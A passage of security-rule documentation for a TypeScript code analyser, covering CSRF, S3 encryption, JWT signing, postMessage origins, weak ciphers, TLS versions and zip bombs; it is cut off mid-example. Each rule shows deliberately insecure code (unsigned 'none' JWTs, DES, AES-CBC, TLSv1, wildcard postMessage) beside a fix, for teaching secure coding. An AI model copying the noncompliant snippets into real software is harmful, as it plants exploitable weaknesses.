Express.js CSURF middleware protection is used on unsafe methods:

let csrf = require('csurf');
let express = require('express');

let csrfProtection = csrf({ cookie:  true });

let app = express();

app.post('/money_transfer', parseForm, csrfProtection, function (req, res) { // Compliant
  res.send('Money transferred')
});

Protection provided by Express.js CSURF middleware is enabled on unsafe methods:

let csrf = require('csurf');
let express = require('express');

app.use(csrf({ cookie: true, ignoreMethods: ["GET"] })); // Compliant

See

typescript:S6245

Server-side encryption (SSE) encrypts an object (not the metadata) as it is written to disk (where the S3 bucket resides) and decrypts it as it is read from disk. This doesn’t change the way the objects are accessed, as long as the user has the necessary permissions, objects are retrieved as if they were unencrypted. Thus, SSE only helps in the event of disk thefts, improper disposals of disks and other attacks on the AWS infrastructure itself.

There are three SSE options:

  • Server-Side Encryption with Amazon S3-Managed Keys (SSE-S3)
    • AWS manages encryption keys and the encryption itself (with AES-256) on its own.
  • Server-Side Encryption with Customer Master Keys (CMKs) Stored in AWS Key Management Service (SSE-KMS)
    • AWS manages the encryption (AES-256) of objects and encryption keys provided by the AWS KMS service.
  • Server-Side Encryption with Customer-Provided Keys (SSE-C)
    • AWS manages only the encryption (AES-256) of objects with encryption keys provided by the customer. AWS doesn’t store the customer’s encryption keys.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure needs to comply to some regulations, like HIPAA or PCI DSS, and other standards.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to use SSE. Choosing the appropriate option depends on the level of control required for the management of encryption keys.

Sensitive Code Example

Server-side encryption is not used:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'default'
}); // Sensitive

Bucket encryption is disabled by default.

Compliant Solution

Server-side encryption with Amazon S3-Managed Keys is used:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    encryption: s3.BucketEncryption.KMS_MANAGED
});

# Alternatively with a KMS key managed by the user.

new s3.Bucket(this, 'id', {
    encryption: s3.BucketEncryption.KMS_MANAGED,
    encryptionKey: access_key
});

See

typescript:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers or applications distributed to end users.

Sensitive Code Example

errorhandler Express.js middleware should not be used in production:

const express = require('express');
const errorhandler = require('errorhandler');

let app = express();
app.use(errorhandler()); // Sensitive

Compliant Solution

errorhandler Express.js middleware used only in development mode:

const express = require('express');
const errorhandler = require('errorhandler');

let app = express();

if (process.env.NODE_ENV === 'development') {
  app.use(errorhandler());
}

See

typescript:S5604

Powerful features are browser features (geolocation, camera, microphone …​) that can be accessed with JavaScript API and may require a permission granted by the user. These features can have a high impact on privacy and user security thus they should only be used if they are really necessary to implement the critical parts of an application.

This rule highlights intrusive permissions when requested with the future standard (but currently experimental) web browser query API and specific APIs related to the permission. It is highly recommended to customize this rule with the permissions considered as intrusive in the context of the web application.

Ask Yourself Whether

  • Some powerful features used by the application are not really necessary.
  • Users are not clearly informed why and when powerful features are used by the application.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • In order to respect user privacy it is recommended to avoid using intrusive powerful features.

Sensitive Code Example

When using geolocation API, Firefox for example retrieves personal information like nearby wireless access points and IP address and sends it to the default geolocation service provider, Google Location Services:

navigator.permissions.query({name:"geolocation"}).then(function(result) {
});  // Sensitive: geolocation is a powerful feature with high privacy concerns

navigator.geolocation.getCurrentPosition(function(position) {
  console.log("coordinates x="+position.coords.latitude+" and y="+position.coords.longitude);
}); // Sensitive: geolocation is a powerful feature with high privacy concerns

Compliant Solution

If geolocation is required, always explain to the user why the application needs it and prefer requesting an approximate location when possible:

<html>
<head>
    <title>
        Retailer website example
    </title>
</head>
<body>
    Type a city, street or zip code where you want to retrieve the closest retail locations of our products:
    <form method=post>
        <input type=text value="New York"> <!-- Compliant -->
    </form>
</body>
</html>

See

typescript:S5725

Using remote artifacts without integrity checks can lead to the unexpected execution of malicious code in the application.

On the client side, where front-end code is executed, malicious code could:

  • impersonate users' identities and take advantage of their privileges on the application.
  • add quiet malware that monitors users' session and capture sensitive secrets.
  • gain access to sensitive clients' personal data.
  • deface, or otherwise affect the general availability of the application.
  • mine cryptocurrencies in the background.

Likewise, a compromised software piece that would be deployed on a server-side application could badly affect the application’s security. For example, server-side malware could:

  • access and modify sensitive technical and business data.
  • elevate its privileges on the underlying operating system.
  • Use the compromised application as a pivot to attack the local network.

By ensuring that a remote artifact is exactly what it is supposed to be before using it, the application is protected from unexpected changes applied to it before it is downloaded.
Especially, integrity checks will allow for identifying an artifact replaced by malware on the publication website or that was legitimately changed by its author, in a more benign scenario.

Important note: downloading an artifact over HTTPS only protects it while in transit from one host to another. It provides authenticity and integrity checks for the network stream only. It does not ensure the authenticity or security of the artifact itself.

Ask Yourself Whether

  • The artifact is a file intended to execute code.
  • The artifact is a file that is intended to configure or affect running code in some way.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

To check the integrity of a remote artifact, hash verification is the most reliable solution. It does ensure that the file has not been modified since the fingerprint was computed.

In this case, the artifact’s hash must:

  • Be computed with a secure hash algorithm such as SHA512, SHA384 or SHA256.
  • Be compared with a secure hash that was not downloaded from the same source.

To do so, the best option is to add the hash in the code explicitly, by following Mozilla’s official documentation on how to generate integrity strings.

Note: Use this fix together with version binding on the remote file. Avoid downloading files named "latest" or similar, so that the front-end pages do not break when the code of the latest remote artifact changes.

Sensitive Code Example

The following code sample uses neither integrity checks nor version pinning:

let script = document.createElement("script");
script.src = "https://cdn.example.com/latest/script.js"; // Sensitive
script.crossOrigin = "anonymous";
document.head.appendChild(script);

Compliant Solution

let script = document.createElement("script");
script.src = "https://cdn.example.com/v5.3.6/script.js";
script.integrity = "sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC";
script.crossOrigin = "anonymous";
document.head.appendChild(script);

See

typescript:S5728

Content security policy (CSP) (fetch directives) is a W3C standard which is used by a server to specify, via a http header, the origins from where the browser is allowed to load resources. It can help to mitigate the risk of cross site scripting (XSS) attacks and reduce privileges used by an application. If the website doesn’t define CSP header the browser will apply same-origin policy by default.

Content-Security-Policy: default-src 'self'; script-src ‘self ‘ http://www.example.com

In the above example, all resources are allowed from the website where this header is set and script resources fetched from example.com are also authorized:

<img src="selfhostedimage.png></script> <!-- will be loaded because default-src 'self'; directive is applied  -->
<img src="http://www.example.com/image.png></script>  <!-- will NOT be loaded because default-src 'self'; directive is applied  -->
<script src="http://www.example.com/library.js></script> <!-- will be loaded because script-src ‘self ‘ http://www.example.comdirective is applied  -->
<script src="selfhostedscript.js></script> <!-- will be loaded because script-src ‘self ‘ http://www.example.com directive is applied  -->
<script src="http://www.otherexample.com/library.js></script> <!-- will NOT be loaded because script-src ‘self ‘ http://www.example.comdirective is applied  -->

Ask Yourself Whether

  • The resources of the application are fetched from various untrusted locations.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement content security policy fetch directives, in particular default-src directive and continue to properly sanitize and validate all inputs of the application, indeed CSP fetch directives is only a tool to reduce the impact of cross site scripting attacks.

Sensitive Code Example

In a Express.js application, the code is sensitive if the helmet contentSecurityPolicy middleware is disabled:

const express = require('express');
const helmet = require('helmet');

let app = express();
app.use(
    helmet({
      contentSecurityPolicy: false, // sensitive
    })
);

Compliant Solution

In a Express.js application, a standard way to implement CSP is the helmet contentSecurityPolicy middleware:

const express = require('express');
const helmet = require('helmet');

let app = express();
app.use(helmet.contentSecurityPolicy()); // Compliant

See

typescript:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data but turned into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers will compress irrelevant data (eg: a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the ratio between compressed and uncompressed data, in general the data compression ratio for most of the legit archives is 1 to 3.
  • Define and control the threshold for maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if their number is greater than a predefined threshold, in particular it’s not recommended to recursively expand archives (an entry of an archive could be also an archive).

Sensitive Code Example

For tar module:

const tar = require('tar');

tar.x({ // Sensitive
  file: 'foo.tar.gz'
});

For adm-zip module:

const AdmZip = require('adm-zip');

let zip = new AdmZip("./foo.zip");
zip.extractAllTo("."); // Sensitive

For jszip module:

const fs = require("fs");
const JSZip = require("jszip");

fs.readFile("foo.zip", function(err, data) {
  if (err) throw err;
  JSZip.loadAsync(data).then(function (zip) { // Sensitive
    zip.forEach(function (relativePath, zipEntry) {
      if (!zip.file(zipEntry.name)) {
        fs.mkdirSync(zipEntry.name);
      } else {
        zip.file(zipEntry.name).async('nodebuffer').then(function (content) {
          fs.writeFileSync(zipEntry.name, content);
        });
      }
    });
  });
});

For yauzl module

const yauzl = require('yauzl');

yauzl.open('foo.zip', function (err, zipfile) {
  if (err) throw err;

  zipfile.on("entry", function(entry) {
    zipfile.openReadStream(entry, function(err, readStream) {
      if (err) throw err;
      // TODO: extract
    });
  });
});

For extract-zip module:

const extract = require('extract-zip')

async function main() {
  let target = __dirname + '/test';
  await extract('test.zip', { dir: target }); // Sensitive
}
main();

Compliant Solution

For tar module:

const tar = require('tar');
const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB

let fileCount = 0;
let totalSize = 0;

tar.x({
  file: 'foo.tar.gz',
  filter: (path, entry) => {
    fileCount++;
    if (fileCount > MAX_FILES) {
      throw 'Reached max. number of files';
    }

    totalSize += entry.size;
    if (totalSize > MAX_SIZE) {
      throw 'Reached max. size';
    }

    return true;
  }
});

For adm-zip module:

const AdmZip = require('adm-zip');
const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
const THRESHOLD_RATIO = 10;

let fileCount = 0;
let totalSize = 0;
let zip = new AdmZip("./foo.zip");
let zipEntries = zip.getEntries();
zipEntries.forEach(function(zipEntry) {
    fileCount++;
    if (fileCount > MAX_FILES) {
        throw 'Reached max. number of files';
    }

    let entrySize = zipEntry.getData().length;
    totalSize += entrySize;
    if (totalSize > MAX_SIZE) {
        throw 'Reached max. size';
    }

    let compressionRatio = entrySize / zipEntry.header.compressedSize;
    if (compressionRatio > THRESHOLD_RATIO) {
        throw 'Reached max. compression ratio';
    }

    if (!zipEntry.isDirectory) {
        zip.extractEntryTo(zipEntry.entryName, ".");
    }
});

For jszip module:

const fs = require("fs");
const pathmodule = require("path");
const JSZip = require("jszip");

const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB

let fileCount = 0;
let totalSize = 0;
let targetDirectory = __dirname + '/archive_tmp';

fs.readFile("foo.zip", function(err, data) {
  if (err) throw err;
  JSZip.loadAsync(data).then(function (zip) {
    zip.forEach(function (relativePath, zipEntry) {
      fileCount++;
      if (fileCount > MAX_FILES) {
        throw 'Reached max. number of files';
      }

      // Prevent ZipSlip path traversal (S6096)
      const resolvedPath = pathmodule.join(targetDirectory, zipEntry.name);
      if (!resolvedPath.startsWith(targetDirectory)) {
        throw 'Path traversal detected';
      }

      if (!zip.file(zipEntry.name)) {
        fs.mkdirSync(resolvedPath);
      } else {
        zip.file(zipEntry.name).async('nodebuffer').then(function (content) {
          totalSize += content.length;
          if (totalSize > MAX_SIZE) {
            throw 'Reached max. size';
          }

          fs.writeFileSync(resolvedPath, content);
        });
      }
    });
  });
});

Be aware that due to the similar structure of sensitive and compliant code the issue will be raised in both cases. It is up to the developer to decide if the implementation is secure.

For yauzl module

const yauzl = require('yauzl');

const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
const THRESHOLD_RATIO = 10;

yauzl.open('foo.zip', function (err, zipfile) {
  if (err) throw err;

  let fileCount = 0;
  let totalSize = 0;

  zipfile.on("entry", function(entry) {
    fileCount++;
    if (fileCount > MAX_FILES) {
      throw 'Reached max. number of files';
    }

    // The uncompressedSize comes from the zip headers, so it might not be trustworthy.
    // Alternatively, calculate the size from the readStream.
    let entrySize = entry.uncompressedSize;
    totalSize += entrySize;
    if (totalSize > MAX_SIZE) {
      throw 'Reached max. size';
    }

    if (entry.compressedSize > 0) {
      let compressionRatio = entrySize / entry.compressedSize;
      if (compressionRatio > THRESHOLD_RATIO) {
        throw 'Reached max. compression ratio';
      }
    }

    zipfile.openReadStream(entry, function(err, readStream) {
      if (err) throw err;
      // TODO: extract
    });
  });
});

Be aware that due to the similar structure of sensitive and compliant code the issue will be raised in both cases. It is up to the developer to decide if the implementation is secure.

For extract-zip module:

const extract = require('extract-zip')

const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
const THRESHOLD_RATIO = 10;

async function main() {
  let fileCount = 0;
  let totalSize = 0;

  let target = __dirname + '/foo';
  await extract('foo.zip', {
    dir: target,
    onEntry: function(entry, zipfile) {
      fileCount++;
      if (fileCount > MAX_FILES) {
        throw 'Reached max. number of files';
      }

      // The uncompressedSize comes from the zip headers, so it might not be trustworthy.
      // Alternatively, calculate the size from the readStream.
      let entrySize = entry.uncompressedSize;
      totalSize += entrySize;
      if (totalSize > MAX_SIZE) {
        throw 'Reached max. size';
      }

      if (entry.compressedSize > 0) {
        let compressionRatio = entrySize / entry.compressedSize;
        if (compressionRatio > THRESHOLD_RATIO) {
          throw 'Reached max. compression ratio';
        }
      }
    }
  });
}
main();

See

typescript:S6252

S3 buckets can be versioned. When the S3 bucket is unversioned it means that a new version of an object overwrites an existing one in the S3 bucket.

It can lead to unintentional or intentional information loss.

Ask Yourself Whether

  • The bucket stores information that require high availability.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to enable S3 versioning and thus to have the possibility to retrieve and restore different versions of an object.

Sensitive Code Example

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    versioned: false // Sensitive
});

The default value of versioned is false so the absence of this parameter is also sensitive.

Compliant Solution

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    versioned: true
});

See

typescript:S5659

This vulnerability allows forging of JSON Web Tokens to impersonate other users.

Why is this an issue?

JSON Web Tokens (JWTs), a popular method of securely transmitting information between parties as a JSON object, can become a significant security risk when they are not properly signed with a robust cipher algorithm, left unsigned altogether, or if the signature is not verified. This vulnerability class allows malicious actors to craft fraudulent tokens, effectively impersonating user identities. In essence, the integrity of a JWT hinges on the strength and presence of its signature.

What is the potential impact?

When a JSON Web Token is not appropriately signed with a strong cipher algorithm or if the signature is not verified, it becomes a significant threat to data security and the privacy of user identities.

Impersonation of users

JWTs are commonly used to represent user authorization claims. They contain information about the user’s identity, user roles, and access rights. When these tokens are not securely signed, it allows an attacker to forge them. In essence, a weak or missing signature gives an attacker the power to craft a token that could impersonate any user. For instance, they could create a token for an administrator account, gaining access to high-level permissions and sensitive data.

Unauthorized data access

When a JWT is not securely signed, it can be tampered with by an attacker, and the integrity of the data it carries cannot be trusted. An attacker can manipulate the content of the token and grant themselves permissions they should not have, leading to unauthorized data access.

How to fix it in jsonwebtoken

Code examples

The following code contains examples of JWT encoding and decoding without a strong cipher algorithm.

Noncompliant code example

const jwt = require('jsonwebtoken');

jwt.sign(payload, key, { algorithm: 'none' }); // Noncompliant
const jwt = require('jsonwebtoken');

jwt.verify(token, key, {
    expiresIn: 360000,
    algorithms: ['none'] // Noncompliant
}, callbackcheck);

Compliant solution

const jwt = require('jsonwebtoken');

jwt.sign(payload, key, { algorithm: 'HS256' });
const jwt = require('jsonwebtoken');

jwt.verify(token, key, {
    expiresIn: 360000,
    algorithms: ['HS256']
}, callbackcheck);

How does this work?

Always sign your tokens

The foremost measure to enhance JWT security is to ensure that every JWT you issue is signed. Unsigned tokens are like open books that anyone can tamper with. Signing your JWTs ensures that any alterations to the tokens after they have been issued can be detected. Most JWT libraries support a signing function, and using it is usually as simple as providing a secret key when the token is created.

Choose a strong cipher algorithm

It is not enough to merely sign your tokens. You need to sign them with a strong cipher algorithm. Algorithms like HS256 (HMAC using SHA-256) are considered secure for most purposes. But for an additional layer of security, you could use an algorithm like RS256 (RSA Signature with SHA-256), which uses a private key for signing and a public key for verification. This way, even if someone gains access to the public key, they will not be able to forge tokens.

Verify the signature of your tokens

Resolving a vulnerability concerning the validation of JWT token signatures is mainly about incorporating a critical step into your process: validating the signature every time a token is decoded. Just having a signed token using a secure algorithm is not enough. If you are not validating signatures, they are not serving their purpose.

Every time your application receives a JWT, it needs to decode the token to extract the information contained within. It is during this decoding process that the signature of the JWT should also be checked.

To resolve the issue follow these instructions:

  1. Use framework-specific functions for signature verification: Most programming frameworks that support JWTs provide specific functions to not only decode a token but also validate its signature simultaneously. Make sure to use these functions when handling incoming tokens.
  2. Handle invalid signatures appropriately: If a JWT’s signature does not validate correctly, it means the token is not trustworthy, indicating potential tampering. The action to take on encountering an invalid token should be denying the request carrying it and logging the event for further investigation.
  3. Incorporate signature validation in your tests: When you are writing tests for your application, include tests that check the signature validation functionality. This can help you catch any instances where signature verification might be unintentionally skipped or bypassed.

By following these practices, you can ensure the security of your application’s JWT handling process, making it resistant to attacks that rely on tampering with tokens. Validation of the signature needs to be an integral and non-negotiable part of your token handling process.

Going the extra mile

Securely store your secret keys

Ensure that your secret keys are stored securely. They should not be hard-coded into your application code or checked into your version control system. Instead, consider using environment variables, secure key management systems, or vault services.

Rotate your secret keys

Even with the strongest cipher algorithms, there is a risk that your secret keys may be compromised. Therefore, it is a good practice to periodically rotate your secret keys. By doing so, you limit the amount of time that an attacker can misuse a stolen key. When you rotate keys, be sure to allow a grace period where tokens signed with the old key are still accepted to prevent service disruptions.

Resources

Standards

typescript:S2819

Why is this an issue?

Browsers allow message exchanges between Window objects of different origins.

Because any window can send or receive messages from another window, it is important to verify the sender’s/receiver’s identity:

  • When sending a message with the postMessage method, the identity’s receiver should be defined (the wildcard keyword (*) should not be used).
  • When receiving a message with a message event, the sender’s identity should be verified using the origin and possibly source properties.

Noncompliant code example

When sending a message:

var iframe = document.getElementById("testiframe");
iframe.contentWindow.postMessage("secret", "*"); // Noncompliant: * is used

When receiving a message:

window.addEventListener("message", function(event) { // Noncompliant: no checks are done on the origin property.
      console.log(event.data);
 });

Compliant solution

When sending a message:

var iframe = document.getElementById("testsecureiframe");
iframe.contentWindow.postMessage("hello", "https://secure.example.com"); // Compliant

When receiving a message:

window.addEventListener("message", function(event) {

  if (event.origin !== "http://example.org") // Compliant
    return;

  console.log(event.data)
});

Resources

typescript:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Node.js

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

const crypto = require('crypto');

crypto.createCipheriv("DES", key, iv); // Noncompliant

Compliant solution

const crypto = require('crypto');

crypto.createCipheriv("AES-256-GCM", key, iv);

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Standards

typescript:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB

(Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

And for RSA, the weakest algorithms are either using it without padding or using the PKCS1v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Node.js

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

const crypto = require('crypto');

crypto.createCipheriv("AES-128-CBC", key, iv); // Noncompliant

Compliant solution

Example with a symmetric cipher, AES:

const crypto = require('crypto');

crypto.createCipheriv("AES-256-GCM", key, iv);

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Cipher Block Chaining with Message Authentication Code
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integer Authenticated Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it

is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

typescript:S4787

This rule is deprecated; use S4426, S5542, S5547 instead.

Encrypting data is security-sensitive. It has led in the past to the following vulnerabilities:

Proper encryption requires both the encryption algorithm and the key to be strong. Obviously the private key needs to remain secret and be renewed regularly. However these are not the only means to defeat or weaken an encryption.

This rule flags function calls that initiate encryption/decryption.

Ask Yourself Whether

  • the private key might not be random, strong enough or the same key is reused for a long long time.
  • the private key might be compromised. It can happen when it is stored in an unsafe place or when it was transferred in an unsafe manner.
  • the key exchange is made without properly authenticating the receiver.
  • the encryption algorithm is not strong enough for the level of protection required. Note that encryption algorithms strength decreases as time passes.
  • the chosen encryption library is deemed unsafe.
  • a nonce is used, and the same value is reused multiple times, or the nonce is not random.
  • the RSA algorithm is used, and it does not incorporate an Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.
  • the CBC (Cypher Block Chaining) algorithm is used for encryption, and it’s IV (Initialization Vector) is not generated using a secure random algorithm, or it is reused.
  • the Advanced Encryption Standard (AES) encryption algorithm is used with an unsecure mode. See the recommended practices for more information.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Generate encryption keys using secure random algorithms.
  • When generating cryptographic keys (or key pairs), it is important to use a key length that provides enough entropy against brute-force attacks. For the Blowfish algorithm the key should be at least 128 bits long, while for the RSA algorithm it should be at least 2048 bits long.
  • Regenerate the keys regularly.
  • Always store the keys in a safe location and transfer them only over safe channels.
  • If there is an exchange of cryptographic keys, check first the identity of the receiver.
  • Only use strong encryption algorithms. Check regularly that the algorithm is still deemed secure. It is also imperative that they are implemented correctly. Use only encryption libraries which are deemed secure. Do not define your own encryption algorithms as they will most probably have flaws.
  • When a nonce is used, generate it randomly every time.
  • When using the RSA algorithm, incorporate an Optimal Asymmetric Encryption Padding (OAEP).
  • When CBC is used for encryption, the IV must be random and unpredictable. Otherwise it exposes the encrypted value to crypto-analysis attacks like "Chosen-Plaintext Attacks". Thus a secure random algorithm should be used. An IV value should be associated to one and only one encryption cycle, because the IV’s purpose is to ensure that the same plaintext encrypted twice will yield two different ciphertexts.
  • The Advanced Encryption Standard (AES) encryption algorithm can be used with various modes. Galois/Counter Mode (GCM) with no padding should be preferred to the following combinations which are not secured:
    • Electronic Codebook (ECB) mode: Under a given key, any given plaintext block always gets encrypted to the same ciphertext block. Thus, it does not hide data patterns well. In some senses, it doesn’t provide serious message confidentiality, and it is not recommended for use in cryptographic protocols at all.
    • Cipher Block Chaining (CBC) with PKCS#5 padding (or PKCS#7) is susceptible to padding oracle attacks.

Sensitive Code Example

// === Client side ===
crypto.subtle.encrypt(algo, key, plainData); // Sensitive
crypto.subtle.decrypt(algo, key, encData); // Sensitive
// === Server side ===
const crypto = require("crypto");
const cipher = crypto.createCipher(algo, key); // Sensitive
const cipheriv = crypto.createCipheriv(algo, key, iv); // Sensitive
const decipher = crypto.createDecipher(algo, key); // Sensitive
const decipheriv = crypto.createDecipheriv(algo, key, iv); // Sensitive
const pubEnc = crypto.publicEncrypt(key, buf); // Sensitive
const privDec = crypto.privateDecrypt({ key: key, passphrase: secret }, pubEnc); // Sensitive
const privEnc = crypto.privateEncrypt({ key: key, passphrase: secret }, buf); // Sensitive
const pubDec = crypto.publicDecrypt(key, privEnc); // Sensitive

See

typescript:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Node.js

Code examples

Noncompliant code example

NodeJs offers multiple ways to set weak TLS protocols. For https and tls, these options are used and are used in other third-party libraries as well.

The first is secureProtocol:

const https = require('node:https');
const tls   = require('node:tls');

let options = {
 secureProtocol: 'TLSv1_method' // Noncompliant
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

The second is the combination of minVersion and maxVerison. Note that they cannot be specified along with the secureProtocol option:

const https = require('node:https');
const tls   = require('node:tls');

let options = {
  minVersion: 'TLSv1.1',  // Noncompliant
  maxVersion: 'TLSv1.2'
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

And secureOptions, which in this example instructs the OpenSSL protocol to turn off some algorithms altogether. In general, this option might trigger side effects and should be used carefully, if used at all.

const https     = require('node:https');
const tls       = require('node:tls');
const constants = require('node:crypto'):

let options = {
  secureOptions:
    constants.SSL_OP_NO_SSLv2
    | constants.SSL_OP_NO_SSLv3
    | constants.SSL_OP_NO_TLSv1
}; // Noncompliant

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

Compliant solution

const https = require('node:https');
const tls   = require('node:tls');

let options = {
  secureProtocol: 'TLSv1_2_method'
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });
const https = require('node:https');
const tls   = require('node:tls');

let options = {
  minVersion: 'TLSv1.2',
  maxVersion: 'TLSv1.2'
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

Here, the goal is to turn on only TLSv1.2 and higher, by turning off all lower versions:

const https = require('node:https');
const tls   = require('node:tls');

let options = {
